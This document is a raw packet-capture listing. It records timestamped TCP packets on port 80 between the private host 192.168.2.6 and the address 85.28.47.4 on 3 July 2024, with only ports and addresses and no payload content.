Jul 3, 2024 18:08:37.498949051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.498969078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498980045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.498995066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499015093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499017954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499041080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499066114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499067068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499097109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499105930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499109983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499120951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499134064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499154091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499170065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499221087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499233007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499243021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499253988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499263048 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499265909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499289036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499315977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499351025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499391079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499439001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499450922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499463081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499474049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499479055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499485016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499499083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499510050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499517918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499551058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499583960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499594927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499608040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499619961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499628067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499633074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499636889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499659061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499686003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499757051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499775887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499788046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499795914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499799013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499809980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499810934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499830008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499845028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499903917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499914885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499927998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499938965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.499948025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.499972105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.500106096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500117064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500128031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500138998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500149965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500155926 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.500160933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500166893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500174046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500183105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.500256062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.500844002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.500889063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503667116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503685951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503696918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503717899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503717899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503730059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503736973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503812075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503894091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503906012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503916979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503932953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503943920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503963947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503977060 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.503981113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.503992081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504019022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504023075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504029989 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504040956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504053116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504071951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504112959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504113913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504189014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504199982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504204035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504210949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504221916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504221916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504237890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504256964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504316092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504327059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504337072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504359007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504359961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504378080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504389048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504400015 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504410982 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504421949 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504437923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504478931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504494905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504504919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504515886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504520893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504527092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504537106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504539013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504549980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504565001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504595995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504668951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504679918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504692078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504734993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504734993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504744053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504755020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504779100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504791975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504817963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504870892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504882097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504893064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504904985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504909992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504915953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504926920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.504926920 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504951000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.504972935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.582931995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.582962036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.582974911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.583012104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.583012104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.583013058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589257002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589270115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589282036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589293957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589304924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589313030 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589314938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589325905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589337111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589338064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589356899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589368105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589379072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589382887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589389086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589395046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589401007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589411974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589423895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589435101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589435101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589461088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589476109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589526892 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589545012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589555025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589565992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589577913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589581966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589587927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589600086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589610100 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589611053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589622021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.589626074 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.589653015 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590010881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590080023 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590157032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590169907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590182066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590193033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590197086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590204954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590215921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590220928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590257883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590306044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590317011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590344906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590656996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590668917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590678930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590691090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590702057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590708971 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590744019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590838909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590848923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590859890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590869904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590881109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590882063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590893030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590903997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590907097 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590917110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.590931892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.590950966 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591252089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591264009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591275930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591286898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591298103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591305971 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591310978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591322899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591334105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591334105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591345072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591356039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591366053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591384888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591398954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591403008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591409922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591420889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591432095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591443062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591444016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591469049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591495991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591922998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591933966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591944933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591954947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591959000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.591967106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.591974974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.592008114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595221996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595232964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595246077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595256090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595268011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595273972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595278025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595289946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595314980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595329046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595556021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595568895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595581055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595591068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595602036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595611095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595613956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595626116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595637083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595648050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595649004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595685959 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595719099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595730066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595741034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595752001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595756054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595782995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595901012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595912933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595923901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595930099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595941067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.595951080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595974922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.595999956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596082926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596095085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596107006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596118927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596122026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596131086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596136093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596154928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596179962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596256018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596266985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596278906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596290112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596301079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596306086 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596313000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596323967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596337080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596358061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596419096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596430063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596441984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596457005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.596467972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.596506119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.672842979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.672877073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.672888994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.672909021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.672940016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.673002958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.673015118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.673027039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.673038006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.673054934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.673068047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.675858021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675868988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675880909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675910950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.675934076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:37.675949097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:37.675961018 CEST	80	49710	85.28.47.4	192.168.2.6
